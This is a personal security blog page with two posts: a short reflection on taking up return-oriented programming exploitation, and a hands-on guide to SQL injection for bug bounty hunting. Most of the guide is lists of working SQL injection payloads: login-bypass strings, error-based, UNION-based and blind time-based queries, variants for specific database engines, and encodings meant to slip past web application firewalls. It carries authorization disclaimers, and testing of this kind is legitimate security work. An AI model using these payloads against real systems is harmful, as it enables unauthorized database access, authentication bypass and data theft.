Wednesday, August 6, 2025

Rediscovering My Passion for Exploit Development

 I didn’t have an internet connection for the past two weeks — and honestly, it drove me a little crazy. To ease my boredom, I started digging through old files on my PC looking for something interesting to read.

That’s when I stumbled upon a research paper I had downloaded years ago. The title immediately grabbed my attention:
"Identifying Code Injection and Reuse Payloads in Memory Error Exploits."



Curious, I opened it up and started reading. Although it was packed with highly technical terms and clearly targeted toward C/C++ and assembly language programmers, it still resonated with me. I used to code in C and C++ around 12 years ago, so some of the concepts felt familiar — and exciting.

What really sparked my interest was the realization that this paper dives deep into code injection and reuse attacks, particularly ROP (Return-Oriented Programming) techniques. I had dabbled in code injection before — in fact, I even published a demo program about it here on this blog a couple of years ago. But this paper took things to an entirely new level. I hadn't realized just how deep this rabbit hole goes.

Unfortunately, the paper lacked practical examples — something I really needed to bridge the gap between theory and application. But it gave me a ton of keywords and ideas that I could explore further.

So the moment I got back online this morning, I went straight to ChatGPT and started asking:

  • What is this term?

  • Why is it used?

  • Can you build a sample program for this exploit?

I wanted to understand everything the paper didn't explain in detail — and now I feel like I'm finally connecting the dots. I'm especially excited about how this knowledge can eventually be applied to bug bounty hunting and security research.

This is just the beginning of my journey into ROP attacks, memory exploits, and advanced code reuse techniques. Stay tuned — I’ll be sharing what I learn, along with code samples, demos, and more.

Let’s dive deep into exploitation — one gadget at a time. ๐Ÿง ๐Ÿ’ป๐Ÿ”

๐Ÿ’ฅ SQL Injection Payloads for Bug Bounty Hunting: A Hands-On Guide

 SQL Injection (SQLi) remains one of the most impactful web vulnerabilities — despite being known for over two decades. As a bug bounty hunter, mastering SQLi techniques can earn you serious recognition, bounties, and credibility. But responsible hacking always starts with permission. In this post, we’ll explore practical SQLi payloads you can use only on authorized targets, like those listed on platforms such as HackerOne, Bugcrowd, Synack, and YesWeHack.


๐Ÿšจ Legal Disclaimer

This blog is for educational purposes only. Do not use these techniques on systems you do not have explicit permission to test. Always respect the rules of engagement (RoE) in your bug bounty program.


๐Ÿง  What is SQL Injection?

SQL Injection occurs when an attacker is able to inject arbitrary SQL code into a backend database query. This can lead to unauthorized data access, bypassing authentication, or even full system compromise.


๐Ÿ”Ž Where to Look for SQLi?

SQLi opportunities can be found in:

  • Login forms

  • Search bars

  • Product filters

  • URL parameters

  • HTTP headers (e.g., User-Agent, Referer)

  • Cookies and hidden fields


๐Ÿงช Basic SQLi Payloads

These payloads test for simple injection points.

1
2
3
4
' OR '1'='1
' OR 1=1 --
admin' --
' OR '1'='1' --

Use these on login forms to attempt bypasses. If the app doesn’t sanitize input, you might gain unauthorized access.


๐Ÿงจ Error-Based SQLi

Use these when the server returns SQL-related error messages.

1
2
' AND 1=CAST((SELECT user()) AS INT)--
' AND (SELECT COUNT(*) FROM users) > 0--

Look for verbose error messages like:

You have an error in your SQL syntax...


๐Ÿงฎ UNION-Based SQLi

This technique attempts to merge malicious queries with legitimate ones using UNION SELECT.

1
2
' UNION SELECT null, user() --
' UNION SELECT null, database(), version() --

Use ORDER BY to find the number of columns:

1
2
' ORDER BY 1--
' ORDER BY 2--

๐Ÿ•ต️ Blind SQLi (Boolean-Based)

Ideal when the application behaves differently based on true/false conditions, even without visible errors.

1
2
3
' AND 1=1 --
' AND 1=2 --
' AND SUBSTRING(@@version,1,1)='5' --

Watch for changes in response length or content.


⏳ Time-Based Blind SQLi

Detectable via delayed responses using SLEEP() or WAITFOR DELAY.

1
2
' OR IF(1=1, SLEEP(5), 0)--
'; WAITFOR DELAY '0:0:5'--  -- (SQL Server)

Useful when no output is returned but the response delay reveals logic processing.


๐Ÿ—ƒ️ Targeting Specific Databases

MySQL

1
' UNION SELECT user(), database() --

PostgreSQL
1
' UNION SELECT current_user, version() --

SQL Server
1
' UNION SELECT system_user, @@version --

Oracle
1
' UNION SELECT banner FROM v$version --


๐Ÿงฑ Bypassing WAFs

Use encoding, case changes, or SQL comments:

1
2
3
4
%27%20OR%201=1--
' oR '1'='1
'/*!UNION*/ SELECT NULL,NULL--
%27UnIoN%20SeLeCt%20null,null--

WAFs may block obvious patterns, but these tricks can sneak past.


๐Ÿ› ️ Tools of the Trade

  • sqlmap — Automated SQLi testing tool

  • Burp Suite — With plugins like SQLiPy or Intruder for manual fuzzing

  • NoSQLMap — For MongoDB and other NoSQL targets

  • HackTricks SQLi Cheatsheet — Excellent reference


๐ŸŽฏ Pro Tips for Bounty Hunters

  • ๐Ÿ“‹ Log all payloads: Always keep a record of what you tested and how.

  • ๐Ÿ” Try every input vector: Don’t just test URLs — check headers and cookies too.

  • ๐Ÿ” Understand the app logic: Knowing how queries are structured helps tailor your payloads.

  • ๐Ÿšซ Respect the scope: Always stay within allowed domains/endpoints.


๐Ÿ Final Thoughts

SQL Injection is more than just a classic bug — it’s still a high-value target in bug bounty hunting. Understanding how and where to inject payloads can make the difference between a $0 report and a $5,000+ bounty.

Want to sharpen your skills? Try labs like:

  • PortSwigger Web Security Academy

  • Hack The Box

  • TryHackMe

Happy hunting, and stay ethical!


๐Ÿ”— Follow Me for More

๐Ÿ’ฌ Got a favorite payload or tool? Share it in the comments!

๐Ÿ“ง Subscribe for more bug bounty techniques and real-world examples.